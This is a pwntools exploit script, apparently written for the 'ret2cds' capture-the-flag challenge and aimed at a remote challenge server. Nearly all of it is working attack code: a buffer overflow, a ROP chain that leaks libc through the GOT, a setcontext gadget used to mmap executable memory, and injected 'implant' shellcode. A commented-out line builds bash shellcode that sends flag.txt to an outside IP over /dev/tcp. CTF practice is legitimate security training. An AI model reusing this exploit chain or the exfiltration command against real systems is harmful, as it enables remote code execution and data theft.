from pwn import * import os context.arch = 'amd64' def run(): elf = ELF("../challenge/chall/ret2cds") rop = ROP(elf) rop.write(1, elf.got['write']) print(rop.dump()) libc = ELF("../challenge/chall/libc.so.6") print(hex(libc.symbols['write'])) # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"}) # gdb.attach(r) # r = remote("localhost", 1337) r = remote("ret2cds.be.ax", 34485) try: r.recvuntil("warden: ") r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a)) print(r.recvline()) print(r.recvline()) leak = r.recvline()[1:8] leak = u64(leak.ljust(8, b'\x00')) print(hex(leak)) libc_base = leak - libc.symbols['write'] print(hex(libc_base)) libc.address = libc_base libc_rop = ROP(libc) libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0) libc_rop.read(0, 0x133713370000, 0x10000) print(libc_rop.dump()) print(libc_rop.chain()) # abuse setcontext lol # setcontext is always a good function to look for cool gadgets in # loaded as 0x0 # 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30] # 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88] # 88 00 00 00 # 001581ec 31 c0 XOR EAX,EAX # 001581ee c3 RET fucky_r9_gadget = p64(0x581e1 + libc_base) # load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets pre_rop = ROP(libc) pre_rop.rdx = 0x402008 - 0x30 r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000)) os.system("make") with open("implant.bin", "rb") as f: shellcode = f.read() shellcode += b"\x00" * (0x10000 - len(shellcode)) r.send(shellcode) # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) r.interactive() finally: r.close() if __name__ == "__main__": run()